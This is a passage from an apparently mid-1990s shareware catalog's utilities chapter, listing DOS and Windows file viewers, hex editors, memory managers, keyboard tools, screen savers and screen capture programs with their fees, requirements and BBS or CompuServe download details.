files with reading lists. Lists store file descriptions of up + to 995 characters for easy access to information. Also + provides: reading timers, clipboard view, multi-file search, + and many other tools to make reading on the screen easier. + + + Product: SCAN + Author: EZ Software + Version: 494 (04-04-94) + Needs: IBM AT (80286), DOS 2.0 or better. 640k RAM; Hard disk. + Strongly recommended: Epson printer. + Registration fee: $5.00 (add $2.00 for shipping to Canadian + addresses) (add $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support; bonus utilities; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A text file viewer (PLUS). Use it to browse around your hard + disk, view and/or print text files, and delete old files that + are just cluttering up your directories. It is quick and EZ to + learn, and fun to use. No mouse is needed. + + Chapter 2, "Utilities" 65 + + + + Product: SEE (File Viewer) + Author: MicroFox Company, 216-659-9489 + Version: 5.10 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 64k RAM. + Strongly recommended: Mouse. + Registration fee: $12.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: SEE510.ZIP on BBSs (call 216-661-9065 to download it at + no charge); SEE510.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + SEE510.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Displays any size file with vertical and horizonal scroll bars + and full mouse support. You can freeze the top rows and left + columns as you scroll the rest of the text in any direction. + Can print files and can search for text strings and find + multiple occurances. + + + Product: Simply Docs + Author: SimpleWare + Version: 2.1 (10-29-93) + Needs: IBM PC, DOS 3.1 or better. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, mail support; royalty-free + runtime license; 3-month free upgrading allowed. + Look for: SIMDOC21.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + Compile ASCII text files into EXE/TSR format. Turn README into + RUNME. Use it for program manuals, electronic books, + newsletters, catalogs, master lists, etc. Features easy to use + viewer, search function, extensive support for color documents, + bookmarks, hypertext jumps, print to any device or file, print + any range of pages, print on any printer, auto scrolling, TSRs + swap to EMS/Disk (3.5k), small file size, large documents. + Great program for anyone who distributes text files. + + Chapter 2, "Utilities" 66 + + + + Product: TC's Toolbox + Author: Specific Applications Software, 612-722-9659 + Version: 2.3 (02-17-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; TCT230.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 76470,3424 for + assistance). + SWREG#: 4772 + PsL#: 11838 + Download size: 860k (about 64 minutes with a 2400 baud modem) + Description: + Hex file viewer: view files in a hex & ANSI/ASCII format, + search & compare files, play sound files & more. Font viewer: + display entire font, lists fonts by family, show keyboard map. + System monitor: displays Windows resources. Calendar: monthly + calendar with events you provide. Phone dialer, text editor, + code reference, stopwatch, save it! Contains too many features + to describe here. All come with help files. + + + Product: Technical Editor (DOS) + DOS virtual programmers editor. See full description on + page 228. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 228. + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 25. + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 123. + + Chapter 2, "Utilities" 67 + + + + Product: VIEW_MAN + Author: MicroMetric, 813-377-2515 + Version: 1.10 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. 200k RAM. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: VMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge); VIEMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 0. + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Performs the functions of viewing, editing and/or printing a + selected file in both Hex and ASCII. File selection is by menu + choice rather that typing the path. Viewing and editing task + features include file positioning, search for string, search + and count, and search and replace. Program options may be + specified by command line/menu selection and saved as defaults; + a macro may be defined and run for repetative tasks. Printing + may be directed to any serial or parallel port or a disk file. + + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 58. + + Product: Win Change + Author: JRE Enterprises + Version: 3.6 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WCHG36.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WCHG36.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 1207 + Download size: 387k (about 29 minutes with a 2400 baud modem) + Description: + Provides the ability to globally change and/or find text in + GRP, INI, PIF and other file types. Multiple change/ find + criteria can be specified, works across multiple drives, + including network drives. Provides the capability to "back + out" changes that go awry. Files that have been found or + changed can be viewed, copied, moved, or deleted. + + Chapter 2, "Utilities" 68 + + + + Product: Windev - Windows Developer + Editor/programmer's tools for Windows 3.1. See full + description on page 495. + + Product: Windev - Windows NT Developer + Editor/programmer's tools for Windows NT. See full description + on page 496. + + Product: XED + Author: David L. Dight, +61-2-3314521 + Version: 1.1b (08-24-94) + Needs: IBM AT (80286), DOS 3.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; Mouse. + Registration fee: $15.00 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $4.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: XED11B.ZIP on BBSs (call GARBO.UWASA.FI to download it + at no charge); XED11B.EXE on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 100033,2563 for assistance). + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + A powerful yet simple to use hex/binary file editor. Provides + all the features you'd expect from a binary editor, including + modify file size: insert/delete from any file; text filters; + unassemble; C-like assignment expressions; create C data + definitions; binary display and edit modes; multiple file + markers; search & replace; import file; ASCII/hex/binary/oct/ + dec tables; full mouse support; 25/28/43/50 line modes. A fast + friendly and indispensable tool. + + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 201. + + + 2.3 Hardware utilities + + Product: STEENBURGH's STUFF + 21 batch utilities, input, output, etc. See full description + on page 130. + + Chapter 2, "Utilities" 69 + + + + Product: SysChk + Author: Advanced Personal Systems, 408-298-3703 + Version: 2.38 (09-01-93) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Hard disk; Modem; Mouse; + Network (LAN); CD-ROM drive; EMS memory; XMS memory; math + coprocessor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 497 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + System information checker provides complete details on devices + installed in your system. Shows CPU, bus type, BIOS info, + mouse info, I/O port info, all disk information, CD-ROM, + network, video, memory info, TSRs, system speed, and lots more. + Print out a configuration report on your system. Includes + Pentium detection, I/O IRQs, and SCSI info. + + + 2.3.1 CPU & memory + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 131. + + Product: Free System Resources + Author: Chet Williams, 818-954-9128 + Version: 1.0 (12-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; VBRUN300.DLL. + Registration fee: $10.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 157k (about twelve minutes with a 2400 baud modem) + Description: + Provides notification of low resources. Tracks current and low + percentages for GDI, User and Mem resources. Lets you know + when you are low on resources before you get into trouble. + + Chapter 2, "Utilities" 70 + + + + Product: HiMOVE + Author: C.Sitte Softwaretechnik + Version: 2.20 (05-12-93) + Needs: IBM PC, DOS 3.0 or better. 286 NEAT CHIPSet or NEATsx + CHIPSet or AT/386 CHIPSet or other upper memory hardware. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: HIMOV220.ZIP on BBSs; HIMOVE.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + An upper memory manager for computers with a NEAT CHIPSet from + Chips & Technologies. Uses the shadow RAM capability of these + chipset to create a DOS5 compatible UMB (upper memory block) + area. It can also be used with any other type of UMB provider + software. Lets you load device drivers and resident programs + (TSRs) into unused areas of the upper memory area. Easy menu- + driven installation and configuration. No editing of + Autoexec.bat or Config.sys files is necessary. + + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 75. + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 142. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 134. + + Chapter 2, "Utilities" 71 + + + + Product: VMS40 - EMS emulator (disk) + Author: Fugue Software, +61-7-824-2843 + Version: 1.2 (04-05-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; VMS240.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 3 (or contact userID 100036,311 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Device Driver - emulates EMS memory on your hard disk Allows up + to 32Meg. Can load EMS page frame into high memory Also LMS40 + - converts high memory on 286/386 into EMS memory + + + 2.3.2 Keyboard + + Product: BATUTIL + Batch enhancement language. See full description on page 125. + + Product: DDKEY + Author: David M. Dibble + Version: 2.02 (12-12-93) + Needs: IBM PC, DOS 2.0 or better. 8k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $18.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; bonus utilities. 1 free update disk(s) + sent out. + Look for: DDKEY202.ZIP on BBSs; DDKEY.ZIP on CompuServe in + ZNT:PBS forum LIBrary 0. + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + A 7.5k TSR key redefinition utility for writers and + programmers. Features pop-up editing, optional record mode, + literal key, halt for user entry in macros, chain to another + macro, instant on/off, pair shorthand, toggle CapsLock or + NumLock from macro, specified pause, reassign macros to other + key, automatic capitalization at sentence start, 24-hr alarm, + screen blanker, ASCII table, print screen to file, modify + cursor, load and save key files. Fully customizable. Includes + Dvorak layout utility. + + Chapter 2, "Utilities" 72 + + + + Product: STACKEY + Author: CTRLALT Associates + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $49.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Has the basic function of stacking keystrokes. It uses English + like F1 for the F1 key rather than cryptic hex codes. It + includes simulated pressing of lock keys, shifts, support for + Carousel, Desqview and hotkey/screen reading script control. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + keyboard recorder and more script control, including branching + on hotkeys and screen strings. + + + Product: What-I-DID! for Windows + Author: Mission Critical Software, 313-247-0394 + Version: 1.0 (10-25-93) + Needs: IBM AT (80286), Windows 3.1 or better. 100k RAM; Mouse. + Registration fee: $19.00 (add $6.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of fax, CompuServe, mail support; 1-month return policy; + all ASP-wide offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; WHATID.ZIP on CompuServe + in CIS:WINUSER forum LIBrary 0 (or contact userID 73127,77 for + assistance). + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + A safe Windows 3.1 logger of each user's keystrokes and mouse + clicks by application name, by each window you enter. Companies + use this to 1) record the utilization of a PC by each worker, + and 2) to record the productivity of heavy Windows users. Each + window name and application name are stored, the elapsed time + in the window, and the mouse and keystroke counts. Multi-user, + Paradox engine, buffers IO globally. + + Chapter 2, "Utilities" 73 + + + + 2.3.3 Screen + + Product: ATTRB + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $5.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades. + Look for: availability unknown on BBSs; ATTRB.EXE on CompuServe + in CIS:IBMSYS forum LIBrary 1 (or contact userID 72345,1623 for + assistance). + Download size: 21k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use, intuitive, full screen, WYSIWYG, file attribute + changing utility to replace dos's ATTRIB. Changes attributes + for directory, file or all files at once. Wildcard selection + and directory changing within the program. + + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 125. + + Product: BLANK-IT + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 5.1b (10-11-92) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $15.00 + Registration benefits: Full program functionality; 12 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. + Look for: BLANK51B.ZIP on BBSs (call 401-767-3931 to download it + at no charge); BLANK5.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Blacks out the computer display after a certain "time out" + period so that the computer screen won't become burned in. Burn + in is not uncommon and can destroy a monitor. Contains several + advanced features such as a quick blank "hot key" (Boss key"), + the ability to enable/disable itself while it's loaded, and + much more. Works with all monitors and is compatible with + Windows! Smaller and faster than the rest with more features + and excellent support! + + Chapter 2, "Utilities" 74 + + + + Product: BLANK-IT API Specifications + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 5.1b (10-29-92) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $0.00 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; source code; all ASP-wide offers (see page 6); + discounts on other products. + Look for: APIBLANK.ZIP on BBSs (call 401-767-3931 to download it + at no charge); APIBLK.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A package containing a program, source code, and an API + reference for use with the BLANK-IT screen saver program. + Utilizes the BLANK-IT API to blank the screen and/or unblank + the screen on demand. This program can be used in a DOS batch + file, an application's "script" file, from the WordPerfect + SHELL, and more! Includes full 'C' source code for programmers + to see how to use it! Includes the BLANK-IT API Reference. + + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 63. + + Product: WINPAK #1 + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.2 (01-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $14.95 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. + Look for: WINPAK1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); WNPAK1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A collection of high quality, entertaining screen saver modules + designed to be installed on a system running Windows 3.1. Our + modules are added to the list of screen savers that are + recognized by the Windows Control Panel/Desktop option for + choosing a screen saver. Consists of eight different screen + saver modules and a convenient, easy to use installation + utility. Experience our animation! + + Chapter 2, "Utilities" 75 + + + + 2.3.3.1 EGA/VGA specific + + Product: ColorDOS + Author: KroTek Electronics, 705-268-7352 + Version: 1.52 (06-24-93) + Needs: IBM PC, DOS 3.0 or better. 1k RAM; CGA monitor. + Strongly recommended: EGA monitor. + Registration fee: US$11.00 (add US$3.00 for shipping to U.S. + addresses) (add US$1.50 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support. + 1-month return policy. + Look for: availability unknown on BBSs; CDOS15.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 1 (or contact userID 70620,1755 for + assistance). + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Generates a unique prompt drive letter color and a different + text color for each drive in your system. Also, each + sudirectory in the prompt can have its own color. This gives + instant visual recognition of how many directories from the + root directory you are and also gives the command line an + extreamly pleasing appearance. All options are set using an + excellent setup program and load automatically. 4DOS + compatible. Outputs ANSI escape sequences for different text + color on each drive if required. + + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 559. + + Product: HiVIDEO + Author: C.Sitte Softwaretechnik + Version: 2.03 (05-08-93) + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; site license; all ASP-wide offers (see page 6); + disks of other shareware. + Look for: HIVID203.ZIP on BBSs; HIVID.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Uses the unused graphics memory of the VGA/EGA display adapter + in text mode to expand the conventional DOS memory by 96kB. The + graphics modes are disabled if the conventional memory is + expanded in this way. The expansion can be switched on and off + dynamically from the command line. + + Chapter 2, "Utilities" 76 + + + + Product: Palette Adjuster + Author: Lincoln Beach Software, 314-861-1500 + Version: 1.8 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; all ASP-wide offers (see page 6). + Look for: PAL18.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PAL18.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 0 (or contact userID 70700,630 for assistance). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Customize VGA palette to any color you like. Gives your screen + that truely customized look! + + + Product: VPT + Author: clySmic Software, 518-438-5548 + Version: 4.15 (12-29-91) + Needs: IBM AT (80286), DOS 3.1 or better. VGA monitor. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; VPT415.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 3 (or contact userID 76156,164 for + assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + An interactive, easy to use color setting program for the VGA/ + MCGA. Allows use of all 262,144 VGA color shades in text mode. + Includes color files, command-line or interactive mode. Slick, + graphical-type display, no numbers to type. + + + 2.3.3.2 Screen savers + + If you see "bonus graphics" as a registration benefit for any + of these products, it usually means the author will scan the + color image of your choice for use in your screen saver. + Please contact the author of the product for more details. + + Chapter 2, "Utilities" 77 + + + + Product: CUSTOM SCREEN SAVER (WINDOWS) + Author: Accidental Software, 619-247-2804 + Version: 1.0 (01-15-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. Vbrun300.Dll. + Strongly recommended: CD-ROM drive; sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + all ASP-wide offers (see page 6); discounts on other products. + Look for: CUSTSAVR.ZIP on BBSs. + Download size: 1343k (about 100 minutes with a 2400 baud modem) + Description: + Build your very own custom screen saver with this program. + Registered users can add up to 100 of their own pictures to be + displayed as a screen saver. If you have a Midi, registered + users can add up to 100 midi music files to be played as their + screen saver displays their pictures. Those with a CD-ROM will + be able to listen to CD-AUDIO while the screen saver runs. + Image and Midi files may be individually added. Password + protection and message capability if desired. Images provided. + + + Product: The Lights Go Down [***] + Author: Thomas Hoevel Software-Development + Version: 2.20 (07-07-95) + Needs: IBM AT (80286), Windows 3.0 or better. 2048k RAM; EGA + monitor; Hard disk. (Windows 3.0 must run in Protected [not + Real] Mode.). + Strongly recommended: SVGA monitor; Mouse; sound card. + Registration fee: US$25.00 (add US$4.00 for shipping to U.S. + addresses) (add US$4.00 for shipping to Canadian addresses) + (add US$4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. Bonus source code. + Look for: LIGHTS22.ZIP on BBSs; LIGHTOUT.ZIP on CompuServe in + CIS:PIKAPRO forum LIBrary 18 (or contact userID 100550,324 for + assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Screen saver collection with 28 modules with password and + randomizer. Tremendous graphics, great animations (e.g. Flying + Pigs), surprising special effects. Bitmap Show for .BMP & .JPG + files (sequentially for presentations or by random). Fractal + images with palette animation. Plus dice game and 2 utilities + (WinPulse: graphical display of CPU usage, WControl: exit or + re-start Windows easily). + + Chapter 2, "Utilities" 78 + + + + The German version WEEP was a winner in Ziff-Davis' European + Shareware Awards 1995 (Games category). + + + Product: Mystic Pixels + Author: Tesuji Technology + Version: 1.1 (06-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $7.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: MSTPIX11.ZIP on BBSs; MSTPIX.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71500,3566 for + assistance). + SWREG#: 2853 + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A "kinder, gentler" Windows screen saver that slowly + manipulates pixels on the screen. It runs in one of ten + different modes that either move, recolor, or erase pixels. You + can pick a mode or allow it to randomly pick one each time it + starts. Some modes eventually fade the screen to black while + the others move or recolor the pixels originally on the screen. + + + Product: Photo Show 3D + Author: Progressive Logic + Version: 1.21 (03-05-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; SVGA + monitor. 386+ and 256(exactly) color Windows video driver. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 6 months of unlimited CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 6); + disks of other shareware; discounts on upgrades. JPG image + support. + Look for: availability unknown on BBSs; PS3D.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 73047,253 for + assistance). + SWREG#: 3243 + PsL#: 11590 + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + A Windows screen saver that maps a BMP or PCX image to the + surface of a 3D object and tumbles it across the screen. The + object may be either a flat rectangle with the image on each + side, a cube with the image on all six sides, or a custom ball + shape with a user selectable number of facets. The image may be + + Chapter 2, "Utilities" 79 + + + + either mapped around one half of the custom object or tiled + onto each facet. Great for logos and family photos! + + + Product: Screen Saver Sampler + Author: Damsel Software Group, 603-485-2677 + Version: 2.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk. + Strongly recommended: SVGA monitor; Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, mail + support; all ASP-wide offers (see page 6); discounts on other + products. Bonus screen saver sampler. + Look for: availability unknown on BBSs. + Download size: 2500k (about 186 minutes with a 2400 baud modem) + Description: + Has 24 full-screen images best suited for 256-color VGA cards. + All images are 640 X 480 pixels. 6 images each are shown from + 4 major Damsel screen saver collections; New England + Wildflowers, New Hampshire Wilderness, the Big Sky Collection, + and the Damsel Surreal Art Collection. Screen display time + (approx 30 sec on a 486/33Mhtz) and transition effects are + hard-wired, but password protection and mouse aware/ignore + choices are included. + + + Product: Seascape + Author: Advanced Computer Tektonics, 415-424-1403 + Version: 1.4 (11-26-93) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; SEAS14.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 4 (or contact userID 71204,2226 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + A Windows 3.1 screen saver which displays relatively realistic + fish (Sergeant Majors) and tiny animals on which they feed. The + animation quality is far better than in the usual cartoon-like + fish screen savers, winning comments from users such as + "Beautiful design job" and "Great fish! Just like the real + thing" and "It looks beautiful!", and leading PC Computing (May + '93) to select it as a "Best Bet". + + Chapter 2, "Utilities" 80 + + + + Product: WinSecure + Author: ViewPoint Software, Inc., 714-777-8362 + Version: 2.0 (03-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $5.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support. + Look for: WINSEC20.ZIP on BBSs; WINSEC.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71127,2610 for + assistance). + Download size: 390k (about 29 minutes with a 2400 baud modem) + Description: + Hot key from any Windows program and your personalized + screensaver appears instantly to hide your work. You have the + option to password protect your system. When you return to + continue work, enter your password and it shows you messages + left for you by others, any invalid password attempts, and + whether your PC has been rebooted. Step away from your desk in + style and security. Displays image after time delay and works + as default Windows desktop screen saver. + + + 2.3.3.3 Screen capture + + See also: Utilities, Printer utilities; Graphics, Utilities, + Graphic screen capture. + + Product: Capbuf + Author: Cascoly Software, 206-523-6135 + Version: 1.41 (12-28-90) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $30.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; CAPBUF.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + A memory resident (TSR) program that lets you capture any text + screen and save it for later processing or printing. It's quite + useful for programs that do not otherwise provide means of + printing their results: such as intermediate results of games, + or collecting copies of messages while on a bulletin board. + Also includes a filter to remove line drawing characters. + + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 71. + + Chapter 